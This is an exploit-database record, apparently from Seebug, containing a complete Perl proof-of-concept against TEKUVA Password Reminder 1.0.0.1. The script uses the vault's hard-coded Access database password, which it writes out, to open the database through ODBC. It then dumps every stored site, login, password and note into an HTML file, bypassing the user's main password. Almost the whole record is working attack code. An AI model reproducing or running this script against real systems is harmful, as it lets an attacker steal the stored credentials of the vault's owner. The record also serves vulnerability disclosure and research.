{"sourceData": "\n #!/usr/bin/perl\r\n\r\n# Exploit: TEKUVA Password Reminder Authentication Bypass\r\n# Date: [11/19/2009]\r\n# Author: iqlusion [x+nospam@iqlusion.net]\r\n# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html\r\n# Version: 1.0.0.1\r\n\r\n# Info: TEKUVA Password Reminder is a password vault that allows you to store all\r\n# your credentials in one spot and all you have to remember is a single 'main'\r\n# password to access your vault. Unfortunately, the vault is actually an \r\n# Access 2007 database that is protected by a password which is hard coded into\r\n# the program, not your main password.\r\n#\r\n# This script connects to the database using the hard coded db password and dumps\r\n# everything into an HTML table, bypassing the need to enter the main vault\r\n# password (or use the program at all for that matter). Modify values as needed.\r\n\r\n# Greetz: quetzal : w00tb0t : sck\r\n\r\nuse DBI;\r\n\r\n$DBFile = "C:\\\\Program Files\\\\TEKUVA\\\\Password_Reminder\\\\dtb\\\\rem.accdb";\r\n$sql = "SELECT app,lgn,pwd,nts FROM pwdrem WHERE idn IS NOT NULL";\r\n\r\n$DSN = "DRIVER=Microsoft Access Driver (*.mdb, *.accdb);dbq=$DBFile;pwd=P\\@z19r1m";\r\n$dbh = DBI->connect("dbi:ODBC:$DSN")||die print $DBI::errstr;\r\n$dbh->{LongReadLen}=9001;\r\n$qry = $dbh->prepare($sql);\r\n$qry->execute;\r\n\r\nopen(PWD,">results.html") || die print $!;\r\nprint PWD "<table border=1><thead><tr><td>Application/URL</td><td>Login</td><td>Password</td><td>Notes:</td></tr></thead>\\n";\r\nwhile(my($app,$lgn,$pwd,$nts) = $qry->fetchrow_array()){print PWD "<tr><td>$app</td><td>$lgn</td><td>$pwd</td><td>$nts</td></tr>\\n";}\r\nprint PWD "</table></html>";\r\nprint "Passwords dumped to results.html\\n\\n";\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-18306", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-18306", "type": "seebug", "viewCount": 10, "references": [], "lastseen": "2017-11-19T18:29:35", "published": "2009-11-21T00:00:00", "cvelist": [], "id": "SSV:18306", "enchantments_done": [], "modified": "2009-11-21T00:00:00", "title": "TEKUVA Password Reminder Authentication Bypass", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.5, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.5}, "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645228677}}
TEKUVA Password Reminder Authentication Bypass